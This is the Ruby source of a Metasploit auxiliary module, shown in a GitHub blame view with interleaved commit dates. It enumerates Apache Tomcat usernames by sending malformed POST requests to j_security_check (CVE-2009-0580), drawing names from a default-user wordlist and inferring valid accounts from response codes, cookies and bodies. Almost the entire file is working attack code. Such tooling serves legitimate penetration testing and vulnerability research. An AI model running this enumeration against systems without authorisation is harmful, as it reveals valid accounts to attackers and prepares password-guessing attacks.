metasploit-framework/modules/auxiliary/scanner/http/tomcat_enum.rb

132 lines
4.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Apache Tomcat User Enumeration',
'Description' => %q{
This module enumerates Apache Tomcat's usernames via malformed requests to
j_security_check, which can be found in the web administration package. It should
work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18.
Newer versions no longer have the "admin" package by default. The 'admin' package
is no longer provided for Tomcat 6 and later versions.
},
'Author' =>
[
'Heyder Andrade <heyder.andrade[at]gmail.com>',
'Leandro Oliveira <leandrofernando[at]gmail.com>'
],
'References' =>
[
['BID', '35196'],
['CVE', '2009-0580'],
['OSVDB', '55055'],
2013-08-30 21:28:54 +00:00
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8080),
2015-11-25 17:23:35 +00:00
OptString.new('TARGETURI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
2013-08-30 21:28:54 +00:00
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
2013-09-26 19:34:48 +00:00
File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]),
2013-08-30 21:28:54 +00:00
], self.class)
deregister_options('PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS')
2013-08-30 21:28:54 +00:00
end
def has_j_security_check?
2015-11-25 17:23:35 +00:00
vprint_status("#{full_uri} - Checking j_security_check...")
res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
2013-08-30 21:28:54 +00:00
if res
2015-11-25 17:23:35 +00:00
vprint_status("#{full_uri} - Server returned: #{res.code.to_s}")
2013-08-30 21:28:54 +00:00
return true if res.code == 200 or res.code == 302
end
false
end
def run_host(ip)
unless has_j_security_check?
2015-11-25 17:23:35 +00:00
print_error("#{full_uri} - Unable to enumerate users with this URI")
2013-08-30 21:28:54 +00:00
return
end
@users_found = {}
each_user_pass { |user,pass|
do_login(user)
}
if(@users_found.empty?)
2015-11-25 17:23:35 +00:00
print_status("#{full_uri} - No users found.")
2013-08-30 21:28:54 +00:00
else
2015-11-25 17:23:35 +00:00
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
2013-08-30 21:28:54 +00:00
report_note(
:host => rhost,
:port => rport,
:type => 'tomcat.users',
:data => {:users => @users_found.keys.join(", ")}
)
end
end
def do_login(user)
post_data = "j_username=#{user}&password=%"
2015-11-25 17:23:35 +00:00
vprint_status("#{full_uri} - Apache Tomcat - Trying name: '#{user}'")
2013-08-30 21:28:54 +00:00
begin
res = send_request_cgi(
{
'method' => 'POST',
2015-11-25 17:23:35 +00:00
'uri' => normalize_uri(target_uri.path),
2013-08-30 21:28:54 +00:00
'data' => post_data,
}, 20)
2014-05-13 20:56:12 +00:00
if res and res.code == 200 and !res.get_cookies.empty?
2015-11-25 17:23:35 +00:00
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
2013-08-30 21:28:54 +00:00
elsif res and res.code == 200 and res.body =~ /invalid username/i
2015-11-25 17:23:35 +00:00
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
2013-08-30 21:28:54 +00:00
elsif res and res.code == 500
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
2015-11-25 17:23:35 +00:00
vprint_good("#{full_uri} - Apache Tomcat #{user} found ")
2013-08-30 21:28:54 +00:00
@users_found[user] = :reported
elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
2015-11-25 17:23:35 +00:00
print_good("#{full_uri} - Apache Tomcat #{user} found ")
2013-08-30 21:28:54 +00:00
@users_found[user] = :reported
else
2015-11-25 17:23:35 +00:00
print_error("#{full_uri} - NOT VULNERABLE")
2013-08-30 21:28:54 +00:00
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
2015-11-25 17:23:35 +00:00
print_error("#{full_uri} - UNREACHABLE")
2013-08-30 21:28:54 +00:00
return :abort
end
end
end
=begin
If your Tomcat doesn't have the admin package by default, download it here:
http://archive.apache.org/dist/tomcat/
The package name should look something like: apache-tomcat-[version]-admin.zip
=end